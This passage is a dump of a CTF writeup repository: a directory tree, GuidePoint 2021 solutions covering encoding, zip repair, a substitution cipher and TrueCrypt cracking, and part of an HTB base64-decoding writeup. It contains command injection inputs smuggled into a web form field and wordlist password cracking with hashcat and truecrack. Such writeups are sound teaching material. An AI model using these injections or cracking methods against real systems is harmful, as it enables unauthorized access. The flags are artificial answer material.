├── GuidePoint Security October 2021 ├── Calc │ └── Writeup.md ├── GoFaster │ ├── GOFASTER.txt │ └── Writeup.md ├── Hackback │ └── Writeup.md ├── Hexy │ ├── Writeup.md │ └── hexy.zip ├── Julius │ └── Writeup.md ├── Netcatter │ ├── Writeup.md │ └── netcatter ├── README.md ├── SHA512 │ ├── Writeup.md │ └── secret.tc ├── Sub │ ├── Writeup.md │ └── sub.py └── Walk It Out │ ├── Walk_it_out.7z │ └── Writeup.md ├── HTB - Business CTF 2022 ├── Forensics │ ├── Lina's Invitation.md │ ├── MBCoin.md │ └── Perseverance.md ├── FullPwn │ └── Certification.md ├── README.md └── Reversing │ ├── Breakout.md │ └── Chromeminer.md ├── HTB - Business CTF 2023 ├── Blockchain │ └── Paid_Contr-actor.md ├── Cloud │ └── Unveiled.md ├── Forensics │ ├── Hypercraft.md │ ├── Red_Miners.md │ └── Scripts_and_Formulas.md ├── FullPwn │ ├── Contempt - Revenge.md │ ├── Contempt.md │ └── Langmon.md ├── README.md ├── Scada │ ├── Intrusion.md │ └── Watch_Tower.md └── Web │ ├── Lazy_Ballot.md │ └── Watersnake.md ├── HTB - Business CTF 2024 ├── Cloud │ └── Scurried.md ├── Forensics │ ├── Caving.md │ ├── Silicon_Data_Sleuthing.md │ └── Tangled_Heist.md ├── FullPwn │ ├── Submerged.md │ └── Survivor.md ├── Hardware │ └── Say_Cheese.md ├── Misc │ ├── Aptitude_Test.md │ ├── Chrono_Mind.md │ ├── Locked_Away.md │ └── Zephyr.md ├── README.md └── Web │ ├── Blueprint_Heist.md │ └── Jailbreak.md ├── HTB - Cyber Santa is Coming to Town 2021 ├── Crypto │ ├── Common Mistake.md │ └── Missing Reindeer.md ├── Forensics │ ├── BabyAPT.md │ ├── Giveaway.md │ ├── Honeypot.md │ └── Persist.md ├── Pwn │ └── Mr. 
Snowy.md ├── README.md ├── Reversing │ └── Infiltration.md └── Web │ ├── Elf Directory.md │ ├── Gadget Santa.md │ ├── Naughty or Nice.md │ ├── Toy Management.md │ └── Toy Workshop.md ├── HTB - CyberApocalypse_2022 ├── Forensics │ ├── Golden_Persistence.md │ └── Puppeter.md ├── Misc │ └── Compressor.md ├── Pwn │ └── Space-Pirate-Entrypoint.md ├── Readme.md ├── Reversing │ ├── Omega_One.md │ ├── Snakecode.md │ ├── Teleport.md │ └── Wide.md └── Web │ ├── Amidst_Us.md │ ├── BlinkerFluids.md │ ├── Kryptos_Support.md │ └── Mutation_Lab.md ├── HTB - CyberApocalypse_2023 ├── Blockchain │ ├── Navigating_the_Unknown.md │ └── Shooting101.md ├── Crypto │ ├── Ancient_Encodings.md │ └── Small_Steps.md ├── Forensics │ ├── Alien_Cradle.md │ ├── Bashic_Ransomware.md │ ├── Extraterrestrial_Persistence.md │ ├── Packet_Cyclone.md │ ├── Plaintext_Tleasure.md │ ├── Relic_Maps.md │ └── Roten.md ├── Hardware │ ├── Critical_Flight.md │ ├── Debug.md │ └── Timed_Transmission.md ├── ML │ ├── Last_Hope.md │ ├── Mysterious_Learnings.md │ └── Reconfiguration.md ├── Misc │ ├── Hijack.md │ ├── Persistence.md │ ├── Remote_Computation.md │ └── Restricted.md ├── Pwn │ ├── Getting_Started.md │ ├── Initialise_Connection.md │ ├── Labyrinth.md │ └── Questionnaire.md ├── README.md ├── Reversing │ ├── Needle_in_a_haystack.md │ └── Shattered_Tablet.md └── Web │ ├── Didactic_Octo_Paddles.md │ ├── Drobots.md │ ├── Gunhead.md │ ├── Orbital.md │ ├── Passman.md │ ├── Spybug.md │ ├── TrapTrack.md │ └── Trapped_Source.md ├── HTB - CyberApocalypse_2024 ├── Blockchain │ └── Russian_Roulette.md ├── Crypto │ ├── Dynastic.md │ ├── Iced_TEA.md │ ├── Makeshift.md │ └── Primary_Knowledge.md ├── Forensics │ ├── An_unusual_Sighting.md │ ├── Confinement.md │ ├── Data_Siege.md │ ├── Fake_Boost.md │ ├── Game_Invitation.md │ ├── It_Has_Begun.md │ ├── Phreaky.md │ ├── Pursue_the_Tracks.md │ └── Urgent.md ├── Hardware │ ├── BunnyPass.md │ └── Rids.md ├── Misc │ ├── Character.md │ ├── MultiDigilingual.md │ ├── 
Stop_Drop_and_Roll.md │ └── Unbreakable.md ├── Pwn │ ├── Delulu.md │ └── Writing_on_the_Wall.md ├── README.md ├── Rev │ ├── BoxCutter.md │ ├── Lootstash.md │ └── PackedAway.md └── Web │ ├── Flag_Command.md │ ├── KORP_Terminal.md │ ├── Labyrinth_Linguist.md │ ├── LockTalk.md │ ├── SerialFlow.md │ ├── Testimonial.md │ └── TimeKORP.md ├── HTB - HackTheBoo_2022 ├── Forensics │ ├── Downgrade.md │ ├── Halloween_Invitation.md │ ├── POOF.md │ ├── Trick_or_Breach.md │ └── Wrong_Spooky_Season.md ├── Pwn │ ├── Entity.md │ ├── Pumpkin_Stand.md │ └── Pumpking.md ├── README.md ├── Rev │ ├── Cult_Meeting.md │ ├── EncodedPayload.md │ ├── Ghost_Wrangler.md │ ├── Ouija.md │ └── Secure_Transfer.md └── Web │ ├── Cursed_Secret_Party.md │ ├── Evaluation_Deck.md │ ├── Horror_Feeds.md │ ├── Juggling_Facts.md │ └── Spookifier.md ├── HTB - Machines ├── SolarLab.md ├── Yummy.md └── iClean.md ├── Huntress-CTF-2023 ├── Forensics │ ├── Backdoored_Splunk.md │ ├── Bad_Memory.md │ ├── Dumpster_Fire.md │ ├── Opposable_Thumbs.md │ ├── Rogue_Inbox.md │ ├── Texas_Chainsaw_Massacre:_Tokyo_Drift.md │ ├── Traffic.md │ ├── Tragedy.md │ ├── Tragedy_Redux.md │ └── Wimble.md ├── Malware │ ├── Batchfuscation.md │ ├── Blackcat.md │ ├── Hot_Off_The_Press.md │ ├── HumanTwo.md │ ├── Opendir.md │ ├── PHP_Stager.md │ ├── Rat.md │ ├── Snake_Eater.md │ ├── Snake_Eater_II.md │ ├── Snake_Oil.md │ ├── Speakfriend.md │ ├── Thumb_Drive.md │ ├── VeeBeeEee.md │ └── Zerion.md ├── Misc │ ├── Babel.md │ ├── Discord_Snowflake_Scramble.md │ ├── I_Wont_Let_You_Down.md │ ├── Indirect_Payload.md │ ├── MFAtigue.md │ ├── M_Three_Sixty_Five.md │ ├── Operation_Eradication.md │ ├── Press_Play_on_Tape.md │ ├── Rock_Paper_Psychic.md │ ├── Welcome_to_the_Park.md │ └── Who_is_Real?.md ├── OSINT │ ├── Operation_Not_Found.md │ ├── Under_The_Bridge.md │ └── Where_am_I?.md ├── README.md ├── Stego │ └── Land_Before_Time.md └── Warmups │ ├── Baking.md │ ├── BaseFFFF+1.md │ ├── Book_By_Its_Cover.md │ ├── CaesarMirror.md │ ├── Chicken_Wings.md │ 
├── Comprezz.md │ ├── Dialtone.md │ ├── F12.md │ ├── Layered_Security.md │ ├── Notepad.md │ ├── Query_Code.md │ ├── Read_The_Rules.md │ ├── String_Cheese.md │ └── Technical_Support.md ├── Huntress-CTF-2024 ├── Crypto │ ├── No_need_for_Brutus.md │ └── Strive_Marish_Leadman_TypeCDR.md ├── Forensics │ ├── Ancient_Fossil.md │ ├── Backdoored_Splunk_II.md │ ├── Hidden_Streams.md │ ├── Keyboard_Junkie.md │ └── Zimmer_down.md ├── Groups │ ├── Little_Shop_of_Hashes.md │ └── Nightmare_on_Hunt_Street.md ├── Malware │ ├── Discount_Programming_Devices.md │ ├── Eco-Friendly.md │ ├── Obfuscation_Station.md │ ├── Palimpsest.md │ ├── Ping_Me.md │ ├── Revenge_of_Discount_Programming_Devices.md │ ├── Russian_Roulette.md │ ├── Rustline.md │ ├── Strange_Calc.md │ ├── X-Ray.md │ └── eepy.md ├── Misc │ ├── 1200_Transmissions.md │ ├── Base-p-.md │ ├── Malibu.md │ ├── Red_Phish_Blue_Phish.md │ ├── Sekiro.md │ └── Time_will_tell.md ├── OSINT │ └── Ran_somewhere.md ├── Others │ ├── Baby_Overflow.md │ └── Echo_Chamber.md ├── RE │ ├── Knight's_Quest.md │ └── Stack_It.md ├── README.md ├── Warmups │ ├── Cattle.md │ ├── Finders_Fee.md │ ├── MatryoshkaQR.md │ ├── Mystery.md │ ├── TXT_Message.md │ ├── The_Void.md │ └── Zulu.md ├── Web │ ├── HelpfulDesk.md │ ├── MOVEable.md │ ├── Permission_to_Proxy.md │ ├── PillowFight.md │ ├── Plantopia.md │ ├── Y2J.md │ └── Zippy.md └── challenge-files │ ├── Challenge.zip │ ├── NTUSER.DAT │ ├── Splunk_TA_windows.zip │ ├── ancient.fossil │ ├── app.py │ ├── app.zip │ ├── babybufov │ ├── babybufov.c │ ├── based.txt │ ├── calc.zip │ ├── challenge │ ├── challenge-hidden-streams.zip │ ├── challenge-palimpsest.zip │ ├── challenge-rustline.zip │ ├── echo_chamber.pcap │ ├── eco_friendly │ ├── eepy.zip │ ├── keyboard_junkie │ ├── little_shop_of_hashes_logs.zip │ ├── logs-parts1-5.zip │ ├── oops.py │ ├── ping_me.vbs │ ├── qrcode.png │ ├── ran_somewhere.eml │ ├── russian_roulette.zip │ ├── stack_it.bin │ ├── transmissions.wav │ ├── x-ray.7z │ └── zulu ├── Nahamcon-2022 ├── A 
Wild Ride.md ├── Babiersteps.md ├── Baby RSA Quiz.md ├── Cereal.md ├── Crash Override.md ├── EXtravagant.md ├── Gossip.md ├── Jurassic Park.md ├── Keeber - INCOMPLETE.md ├── Mobilize.md ├── Quirky.md ├── Steamy Locomotive.md ├── The Balloon.md └── Wizard.md ├── Nahamcon-2023 ├── Forensics │ ├── Fetch.md │ ├── Perfectly_Disinfected.md │ └── Raided.md ├── Geosint.md ├── IR.md ├── Misc │ ├── Where's_my_Water.md │ ├── Wordle_Bash.md │ └── Zombie.md ├── README.md ├── Warmups │ ├── Blobber.md │ ├── Glasses.md │ ├── Online_Chatroom.md │ └── Regina.md └── Web │ ├── Marmalade_5.md │ ├── Museum.md │ ├── Star_Wars.md │ └── Stickers.md ├── Nahamcon-2024 ├── Forensics │ ├── LogJam.md │ └── Taking_Up_Residence.md ├── Malware │ ├── Brain_Melt_2.md │ └── Perfectly_Legit_Crypto_Casino.md ├── Misc │ ├── Curly_Fries.md │ ├── Not_Quite_The_Same.md │ └── Seventy_Eight.md ├── Mobile │ ├── Buggy_Jumper_1.md │ ├── Buggy_Jumper_2.md │ ├── Fly_Away_1.md │ └── Kitty_Kitty_Bang_Bang.md ├── Others │ ├── Basics.md │ ├── Indicium.md │ └── Secret_Info.md ├── README.md ├── Rev │ ├── Locked_Box.md │ ├── Taylors_First_Swift.md │ └── Whats_In_The_Box.md └── Web │ ├── Hacker_Web_Store.md │ ├── The_Davinci_Code.md │ └── Thomas_DEVerson.md ├── SnykCon2021 ├── All your flags are belong to root │ └── Writeup.md ├── Browser Preview │ └── Writeup.md ├── ElectronBuzz │ └── Writeup.md ├── Invisible Ink │ └── Writeup.md ├── Magician │ └── Writeup.md ├── Not-hot-dog │ └── Writeup.md ├── README.md ├── Robert Louis Stevenson │ └── Writeup.md ├── Sauerkraut │ └── Writeup.md ├── Zip Viewer │ └── Writeup.md └── qrrr │ └── Writeup.md ├── SnykCon2025 ├── Binary_Exploitation │ ├── Additional_Information_Needed.md │ ├── Calculator.md │ └── Echo.md ├── Crypto │ └── Padding_Gambit.md ├── Forensics │ ├── ClickityClack.md │ └── Free_Range_Packets.md ├── README.md ├── Rev │ ├── An_Offset_Among_Friends.md │ ├── Crabshell.md │ ├── Either-Or.md │ ├── Its_go_time.md │ ├── Math_for_Me.md │ └── letters2nums.md ├── Scripting │ └── 
Coding_Mountains.md ├── Warmups │ ├── Screaming_Crying_Throwing_up.md │ └── Zero_Ex_Six_One.md ├── Web │ ├── D0nutShop.md │ ├── Plantly.md │ ├── TimeOff.md │ ├── Unfurl.md │ ├── VulnScanner.md │ ├── Weblog.md │ ├── Who_is_JH.md │ └── idi0Tic.md └── attachments │ ├── Padding_Gambit.7z │ ├── an-offset │ ├── calculator.py │ ├── challenge.elf │ ├── click.pcapng │ ├── crabshell │ ├── donutshop.zip │ ├── echo │ ├── either-or │ ├── encflag.txt │ ├── flag.txt.encry │ ├── freeRangePackets.pcapng │ ├── idiotic.zip │ ├── its-go-time │ ├── letters2nums.elf │ ├── math4me │ ├── mountains.json │ ├── plantly.zip │ ├── screaming.bin │ ├── timeoff.zip │ ├── unfurl.zip │ ├── vulnscanner.zip │ ├── weblog.zip │ └── who-is-jh.zip ├── THM - AdventofCyber_2023: SideQuests ├── SideQuest1.md ├── SideQuest2.md ├── SideQuest3-Unintended.md └── SideQuest4.md └── Unbreakable-Individual-2024 ├── easy-hide.md ├── fake-add.md ├── flagen.md ├── improper-configuration.md ├── intro-to-assembly.md ├── password-manager-is-a-must.md ├── persisten-reccon.md ├── privilege-not-included.md ├── pygment.md ├── rfc-meta.md ├── safe-password.md ├── secrets-of-winter.md ├── sided-curl.md ├── something-happened.md ├── start-enc.md ├── traffic-e.md ├── wifibasic.md ├── wifiland.md └── you-can-trust-me.md /GuidePoint Security October 2021/Calc/Writeup.md: -------------------------------------------------------------------------------- 1 | This one took me longer than I care to admit. I kept overthinking and overcomplicating things. 2 | 3 | We just get a page to visit: 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/137874431-bf115ab7-b688-4266-bc7a-58fcf2eb8d2a.png) 6 | 7 | We can see it is allowing us to enter letters and numbers and it is doing some math. 
8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/137874512-ba7f4715-4169-4e2c-834c-17d72b8f0244.png) 10 | ![image](https://user-images.githubusercontent.com/80063008/137874533-d5f93df7-781d-4883-8827-e098cc309d3a.png) 11 | 12 | Testing various symbols in the values to try to break the syntax, we see that inserting a `;` does it. So if we break the syntax with a `;`, put in our command, then add another `;` to repair the syntax, we get command injection. 13 | 14 | `;id;` 15 | 16 | ![image](https://user-images.githubusercontent.com/80063008/137874578-5ba4f228-19ca-4c48-8fb9-312e2d08a49d.png) 17 | 18 | `;ls;` 19 | 20 | ![image](https://user-images.githubusercontent.com/80063008/137874598-0ea22606-1ba5-4f5e-a374-452678a540ba.png) 21 | 22 | `;cat+calchdeyenbdw7wjh281y1hd771ujs718hq.txt;` (the `+` stands in for a space in the URL-encoded form value) 23 | 24 | Or, since the file sits in the web root, just request it directly in the browser: 25 | 26 | ![image](https://user-images.githubusercontent.com/80063008/137874633-eb421f91-1f21-4f9e-8373-addd67de82f7.png) 27 | 28 | GPSCTF{89dcce9621fb7181cab196b592116c1a} 29 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/GoFaster/Writeup.md: -------------------------------------------------------------------------------- 1 | We are given a text file: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/137870318-48f400e1-fe49-4057-b537-88048f1811a7.png) 4 | 5 | 6 | With 19999 lines of hex strings: 7 | 8 | ![image](https://user-images.githubusercontent.com/80063008/137870332-a967a39c-6fde-4256-ae35-e4d51936f863.png) 9 | 10 | 11 | Converted what I expected to see in a flag (`CTF`) to hex (`435446`): 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/137870346-87fbeae3-65ff-462c-b7d1-e08b11e44a00.png) 14 | 15 | 16 | Then grepped for that string in the entire file: 17 | 18 | ```bash 19 | grep "435446" GOFASTER.txt 20 | ``` 21 |
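The same search done by decoding each line instead of grepping for the hex of `CTF`, as an added example that is not part of the original writeup. It runs on a few constructed hex lines rather than GOFASTER.txt; the decoy line shows why a raw `grep 435446` can over-match: the bytes `43 54 46` only spell `CTF` when the substring starts on a byte boundary, and a hex substring can straddle one. The flag regex and the sample lines are my own assumptions.

```python
import re

# Constructed sample input standing in for GOFASTER.txt (one hex string per line).
SAMPLE_LINES = [
    b"nothing to see here".hex(),
    # Decoy: the hex substring "435446" is present, but it starts at an odd
    # offset (bytes a4 35 44 62 ...), so the bytes are not 0x43 0x54 0x46 ("CTF").
    "a4354462deadbeef",
    b"StormCTF{constructed_sample_flag}".hex(),
    "zz",  # malformed line: not valid hex, must not crash the scan
]

# Flag shape used by this event (PrefixCTF{...}); adjust for other events.
FLAG_RE = re.compile(r"[A-Za-z0-9_]*CTF\{[^}]*\}")


def grep_hex(lines, needle):
    """Mimic `grep` for the hex encoding of `needle`; returns 1-based line numbers."""
    pattern = needle.encode().hex()
    return [i for i, line in enumerate(lines, 1) if pattern in line.lower()]


def decode_hex_line(line):
    """Decode one hex line to text, or None if it is not valid hex."""
    try:
        raw = bytes.fromhex(line.strip())
    except ValueError:
        return None
    # latin-1 maps every byte to a character, so undecodable junk stays visible
    return raw.decode("latin-1")


def find_flags(lines):
    """Decode every line and return (line_number, flag) for real flag matches."""
    hits = []
    for i, line in enumerate(lines, 1):
        text = decode_hex_line(line)
        if text is None:
            continue
        for m in FLAG_RE.finditer(text):
            hits.append((i, m.group(0)))
    return hits


if __name__ == "__main__":
    # Swap SAMPLE_LINES for the lines of GOFASTER.txt to run it for real.
    print("grep-style hits:", grep_hex(SAMPLE_LINES, "CTF"))
    print("decoded flag hits:", find_flags(SAMPLE_LINES))
```

The grep-style search reports two lines (the decoy and the real one), which is the ambiguity the writeup resolved by eye; decoding first leaves only the genuine flag.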
![image](https://user-images.githubusercontent.com/80063008/137870366-c3e81067-5520-48f1-8fd0-af4adf85eef2.png) 23 | 24 | 25 | Based on the position of the string within the hex, I figured the second hit should be the flag. 26 | 27 | ![image](https://user-images.githubusercontent.com/80063008/137870376-b9cdd507-8790-4ce9-a250-fbc683963e98.png) 28 | 29 | 30 | StormCTF{Learners:Encoding4:56fe2c8aB2A2cA0EedaA54f499fcfd1a} 31 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Hexy/Writeup.md: -------------------------------------------------------------------------------- 1 | We are given just a single zip file. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/137869702-cc3ac824-9533-4f14-ae0d-70a3fc5ccb8c.png) 4 | 5 | 6 | It seems to be corrupted. 7 | 8 | ![image](https://user-images.githubusercontent.com/80063008/137869728-e9874955-607d-46a8-a38f-0dcfcb8df436.png) 9 | 10 | But if we open it in a hex editor, we can see a wrong header, so we can fix that. The first byte is `70` where a zip should start with `50`: replace the 7 with a 5, since the correct local file header signature for a zip file is 11 | `50 4B 03 04` (`PK` followed by `03 04`). 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/137869748-747fd4c9-b310-47d0-ad1b-127425d93a41.png) 14 | 15 | We can then try to unzip it, but it is password protected. So we use zip2john to get the hash: 16 | 17 | ```bash 18 | zip2john hexy.zip > hash.txt 19 | ``` 20 | 21 | I first passed it to hashcat on my Windows machine to use the GPU, as it's way faster (`-m 17210` is the PKZIP (Uncompressed) mode, and `--username` is needed because zip2john prefixes the hash with the archive and file name): 22 | 23 | ```cmd 24 | hashcat.exe -m 17210 hash.txt rockyou.txt --username 25 | ``` 26 | 27 | It failed to crack it.
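Before moving on to the cracking step, the header repair above written out as an added example that is not part of the original writeup. It builds a small in-memory zip (a constructed sample, not hexy.zip), damages the first byte the way the challenge file was damaged (`50` becomes `70`), shows that Python's `zipfile` then refuses to read the member, and patches the local file header signature back to `PK\x03\x04`. The two-of-four-bytes threshold is my own sanity check so that arbitrary data is not blindly stamped with a zip header.

```python
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"  # 50 4B 03 04: local file header signature


def make_sample_zip():
    """Constructed sample archive (not the challenge file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("flag.txt", "GPSCTF{constructed_sample}")
    return buf.getvalue()


def corrupt_first_byte(data, value=0x70):
    """Reproduce the challenge damage: 'P' (0x50) becomes 0x70."""
    return bytes([value]) + data[1:]


def try_read(data, name):
    """Return the member's bytes, or None if the member cannot be read.

    zipfile finds members through the central directory at the end of the
    file, so listing still works on the damaged file; reading a member checks
    the local header signature and fails there."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.read(name)
    except zipfile.BadZipFile:
        return None


def repair_zip_header(data):
    """Patch a damaged local file header signature.

    Returns (repaired_bytes, patched). At least two of the four signature
    bytes must already match, so unrelated data is not 'repaired' into a
    fake zip (assumption: only the signature bytes were damaged)."""
    sig = data[:4]
    if sig == ZIP_LOCAL_HEADER:
        return data, False
    matching = sum(a == b for a, b in zip(sig, ZIP_LOCAL_HEADER))
    if matching < 2:
        raise ValueError("first bytes %s do not look like a damaged zip header" % sig.hex())
    return ZIP_LOCAL_HEADER + data[4:], True


if __name__ == "__main__":
    damaged = corrupt_first_byte(make_sample_zip())
    print("damaged readable:", try_read(damaged, "flag.txt"))
    fixed, patched = repair_zip_header(damaged)
    print("patched:", patched, "content:", try_read(fixed, "flag.txt"))
```

For a password-protected archive like the challenge's, reading the member after the repair still needs the password (`zf.read(name, pwd=...)`), which is what the zip2john/hashcat step provides.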
So I added the best64 rule, and that cracked the password: `forgetfulness` 28 | 29 | ```cmd 30 | hashcat.exe -m 17210 hash.txt rockyou.txt --username -r rules\best64.rule 31 | ``` 32 | 33 | Unzipped the file and got the flag: 34 | 35 | GPSCTF{871daf25893451d1ea8ba3b6736cce52} 36 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Hexy/hexy.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/GuidePoint Security October 2021/Hexy/hexy.zip -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Julius/Writeup.md: -------------------------------------------------------------------------------- 1 | We are given a cipher. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/137869533-55a72cbd-eca4-499e-9c21-fb410bcd06e3.png) 4 | 5 | 6 | If we put it in CyberChef we can see it's just hex, which decodes to something that looks like ROT13 (the title, Julius, points at a Caesar shift).
7 | 8 | ![image](https://user-images.githubusercontent.com/80063008/137869568-19234209-6a46-498f-ba59-cdca1e66a16a.png) 9 | 10 | 11 | If we add ROT13 in Cyberchef, we get the flag: 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/137869578-3f65957e-d95a-493e-b6ca-9f6dca9715d6.png) 14 | 15 | 16 | GPSCTF{11fdd9e891aae2f0c0bce02cd2aaa7f2} 17 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Netcatter/netcatter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/GuidePoint Security October 2021/Netcatter/netcatter -------------------------------------------------------------------------------- /GuidePoint Security October 2021/README.md: -------------------------------------------------------------------------------- 1 | Scored 5th/258 in GuidePoint Security October's CTF. It was loads of fun, I really hope to see some writeups of the challenges I haven't solved. If anyone has done `Best Foot Forward`, `Corona` or `ZipRecon`, please show me some writeup or tell me what the deal was with those. I got some parts of them, but didn't get to the finish line. 2 | 3 | Here are my writeups for the challenges I solved. 
4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/137867433-11fb15c8-605b-4eeb-bcb7-136b4921793e.png) 6 | ![image](https://user-images.githubusercontent.com/80063008/137867467-aa07f054-5c3e-4ac9-879e-0e5dc338b900.png) 7 | ![image](https://user-images.githubusercontent.com/80063008/137867476-f825c8bf-8cfc-40ac-af44-b381bdaf70f7.png) 8 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/SHA512/Writeup.md: -------------------------------------------------------------------------------- 1 | 2 | We are given a file called secret.tc 3 | 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/137866702-c422ec5d-cb2c-4802-a562-6917e2f01559.png) 6 | 7 | 8 | Some Google-fu shows that it is a TrueCrypt container. I installed TrueCrypt and it required a password to mount the file as a volume. 9 | 10 | ![image](https://user-images.githubusercontent.com/80063008/137867198-43aaa0e5-36ee-44d7-8bb1-98bddb14bdc1.png) 11 | 12 | Did some more Google-fu and found there's a Linux tool called TrueCrack which can brute-force the password of such containers. 13 | 14 | The tool's help lists the key derivation function as an option, and SHA512 is one of the choices, which ties back to the title of the challenge. 15 | 16 | ![image](https://user-images.githubusercontent.com/80063008/137866772-59ea0389-57ae-4450-a917-924c0f3c892d.png) 17 | 18 | Ran the command below to crack the password: 19 | 20 | ```bash 21 | truecrack -t secret.tc -w /usr/share/wordlists/rockyou.txt -k 512 22 | ``` 23 | 24 | ![image](https://user-images.githubusercontent.com/80063008/137866792-bc5c14cd-90ec-43a6-856b-051ddc92f36a.png) 25 | 26 | Got the password, and used it to mount the file. Then opened it in Notepad++.
27 | 28 | ![image](https://user-images.githubusercontent.com/80063008/137866842-b93c2426-8a11-486e-8be9-ef5d4fda9ffb.png) 29 | 30 | StormCTF{Misc4:c7B645DDa98414f7a7D0a23EeA36eFa1} 31 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/SHA512/secret.tc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/GuidePoint Security October 2021/SHA512/secret.tc -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Sub/sub.py: -------------------------------------------------------------------------------- 1 | key = {'1': 'j', '0': 'X', '3': 'F', '2': 'o', '5': 'T', '4': 'x', '7': '0', '6': 'P', '9': '}', '8': 'J', ':': 'b', 'A': 'c', 'C': 'p', 'B': 'q', 'E': '7', 'D': 'a', 'G': 'v', 'F': '3', 'I': '5', 'H': '1', 'K': 'O', 'J': 'K', 'M': 'g', 'L': '2', 'O': 'n', 'N': '8', 'Q': 'y', 'P': 'E', 'S': 'e', 'R': 'R', 'U': 'h', 'T': 'W', 'W': 'N', 'V': 'm', 'Y': '9', 'X': 'G', 'Z': 'S', 'a': 'k', 'c': 't', 'b': 'd', 'e': '{', 'd': '4', 'g': 'C', 'f': 'L', 'i': '6', 'h': 'l', 'k': 'Z', 'j': 'z', 'm': 'U', 'l': 's', 'o': 'B', 'n': 'M', 'q': 'I', 'p': 'i', 's': ':', 'r': 'Q', 'u': 'Y', 't': 'r', 'w': 'V', 'v': 'H', 'y': 'D', 'x': 'A', '{': 'f', 'z': 'w', '}': 'u'} 2 | encrypted = 'erBQUpW3fpQDirBFb7c}}FdPT0}x0jdLcokk}xq7jaT3Lpqkju' 3 | 4 | while True: 5 | encrypted = encrypted.translate(str.maketrans(key)) 6 | if 'StormCTF' in encrypted and encrypted[-1] == "}": 7 | print(encrypted) 8 | break 9 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Walk It Out/Walk_it_out.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/GuidePoint Security 
October 2021/Walk It Out/Walk_it_out.7z -------------------------------------------------------------------------------- /HTB - Business CTF 2022/README.md: -------------------------------------------------------------------------------- 1 | We were able to place 67th out of 2979 teams, 9/33 solves... that's top 2.2%. 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/028efa74-fcae-45b0-a695-0bd6bf145a2d) 4 | -------------------------------------------------------------------------------- /HTB - Business CTF 2023/Forensics/Red_Miners.md: -------------------------------------------------------------------------------- 1 | ### Challenge description 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5f25ec84-fc05-4775-a96e-29f27f1d586f) 4 | 5 | We get a bash script from this challenge: 6 | 7 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/773aebe1-07c1-40fb-8616-2d394803a191) 8 | 9 | I didn't look too deeply into it, so I don't know what it actually does. My eyes fell directly on some base64 strings in several different parts of the code.
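As an added example that is not part of the original writeup, the scan below automates what the next steps do by hand: pull every base64-looking token out of a script, decode only the ones that are valid base64 and decode to printable text, and stitch the `partN="..."` fragments back together. The sample script is constructed here from the three fragments this writeup decodes (base64-encoded at run time), buried among a binary blob and a path that show the false positives the filter drops. The second function is the alignment check that also matters for the Caving writeup further down: `HTB{` only base64-encodes as `SFRC...` when it starts on a 3-byte boundary; at the other two alignments it appears as `hUQn` and `IVEJ7`, so a grep for `SFRC` alone can miss it. Token regex, flag regex and the reassembly rules are my own assumptions.

```python
import base64
import re
import string

# Constructed sample script: the three fragments from this challenge, base64-
# encoded at run time, plus lines that look like base64 but are not.
FRAGMENTS = ['part1="HTB{m1n1ng"\n', 'part2="_th31r_w4y"\n', '_t0_m4rs}\n']
_BINARY_DECOY = base64.b64encode(bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A, 0, 0, 0, 13])).decode()
SAMPLE_SCRIPT = "\n".join([
    "#!/bin/bash",
    "CONF=/usr/local/bin/config",  # path: right character set, wrong length
    "echo %s | base64 -d" % base64.b64encode(FRAGMENTS[2].encode()).decode(),
    "echo %s | base64 -d > /tmp/icon" % _BINARY_DECOY,  # valid base64, not text
    "eval $(echo %s | base64 -d)" % base64.b64encode(FRAGMENTS[0].encode()).decode(),
    "eval $(echo %s | base64 -d)" % base64.b64encode(FRAGMENTS[1].encode()).decode(),
])

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")
PRINTABLE = set(string.printable)


def find_encoded_strings(text):
    """Return (token, decoded_text) for every base64 token that decodes to printable text."""
    hits = []
    for token in B64_TOKEN.findall(text):
        if len(token) % 4:  # base64 comes in groups of four characters
            continue
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded and set(decoded) <= PRINTABLE:
            hits.append((token, decoded))
    return hits


def reassemble_flag(decoded_fragments, flag_re=r"HTB\{[^}]*\}"):
    """Order partN="..." fragments by N, append bare fragments in order of appearance, extract the flag."""
    parts, tail = {}, []
    for frag in decoded_fragments:
        m = re.fullmatch(r'part(\d+)="([^"]*)"', frag.strip())
        if m:
            parts[int(m.group(1))] = m.group(2)
        else:
            tail.append(frag.strip())
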